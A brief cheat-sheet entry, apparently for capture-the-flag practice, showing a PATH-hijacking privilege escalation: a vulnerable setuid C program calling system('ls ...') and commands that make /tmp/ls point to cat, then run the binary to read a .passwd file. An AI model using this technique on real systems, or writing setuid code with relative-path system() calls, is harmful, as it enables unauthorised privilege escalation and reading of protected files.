Bash

General & Tricks

# base program
int main(void)
{
        system("ls /path/to/.passwd");
        return 0;
}

# As you as the program is executed with the ā€˜sā€™ flag (owner rights), you can privesc by copying the program you want to impersonate
cp /bin/cat /tmp/ls
PATH=/tmp

# You can escape options
echo '#!/bin/cat --' > /tmp/ls
chmod 755 /tmp/ls
env PATH=/tmp ./binary_setuid .passwd
# base program
int main(void)
{
        system("ls /path/to/.passwd");
        return 0;
}

ln -s /bin/cat /tmp/ls
ls -l /tmp/ls
PATH=/tmp
echo $PATH
./binary1